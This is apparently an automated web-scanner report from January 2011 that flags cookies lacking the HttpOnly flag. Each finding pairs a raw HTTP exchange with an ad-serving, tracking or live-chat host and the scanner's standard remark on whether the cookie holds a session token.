GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313? HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:24 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313? Content-Length: 653 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 16:44:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=b3&migTrackDataExt=n4;USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300;FarmD_2011Q1_TRIBALF_A_TX_300;:$:TribalFusionB3/FarmersDirect/2011Q1/A_TX/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 568 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=188&a ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 16:44:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_TF_CT_728;RS_SELL_2011Q1_TF_CT_728;:$:TribalFusionB3/RadioShack/SELL_2011Q1/CT/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 557 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 16:44:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_TF_CT_728;RS_SELL_2011Q1_TF_CT_728;:$:TribalFusionB3/RadioShack/SELL_2011Q1/CT/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 557 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:49:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Thu, 03 Jun 2010 15:41:54 GMT ETag: "1fe03-1cee-bbc5480" Accept-Ranges: bytes Content-Length: 7406 Content-Type: text/plain Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/5296924/?&site=5296924&cmd=mTagStartPage&lpCallId=388698517112-580234512686&protV=20&lpjson=1&page=http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-english&activePlugin=none&cobrowse=true&PV%21MktSegment=&PV%21unit=sales&PV%21Section=SEOLanding&PV%21CampaignCode=&PV%21pageLoadTime=4%20sec&PV%21visitorActive=1&SV%21language=english&title=Live%20Chat%20by%20LivePerson&cookie=visitor%3Dvarid%3Dbing%26ref%3Dbing%2Bcpc%2B%2Bchat%2B%252Dus%3B%20ASPSESSIONIDQSDTDCQS%3DICGJONICHIIHMLMANIPEDEIG%3B%20__utmz%3D1.1296223198.1.1.utmcsr%3Dbing%7Cutmccn%3Dchat%2520-us%7Cutmcmd%3Dcpc%3B%20__utma%3D1.925961970.1296223198.1296223198.1296223198.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1296223198 HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 13:59:14 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 13:59:14 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/5296924/?&site=5296924&cmd=mTagKnockPage&lpCallId=468449104344-358576817670&protV=20&lpjson=1&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-seo-campaign1%7ClpMTagConfig.db1%7ClpButton-seo-campaign1%7C%23chat-seo-campaign2%7ClpMTagConfig.db1%7ClpButton-seo-campaign2%7C%23voice-seo-campaign%7Cnull%7ClpButton-voice-seo-campaign%7C HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 13:59:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924 Set-Cookie: HumanClickACTIVE=1296223153625; expires=Sat, 29-Jan-2011 13:59:13 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 13:59:13 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 31783
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 28 Jan 2011 14:06:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Location: http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1 Host: base.liveperson.net Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 28 Jan 2011 14:16:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net Set-Cookie: HumanClickKEY=1417917221691646769; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net Set-Cookie: HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H1417917221691646769-7678006185736106283K15949656 Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:06:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LPit=false; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 893
lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C_=BlankImage P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 29 Jan 2011 05:22:47 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2137335&Page=&PluID=0&Pos=1348\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The following cookie was issued by the application and does not have the HttpOnly flag set:
_t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:43:35 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "96e7c3afd30c151e7af6141145727255f5ec8c76" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Thu, 28 Apr 2011 17:43:35 GMT; Path=/ Content-Length: 1303
(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('21d8e954-2b06-11e0-8e8a-0025900870d2');(new Image()).src = 'http://bid.openx.net/cm?p ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
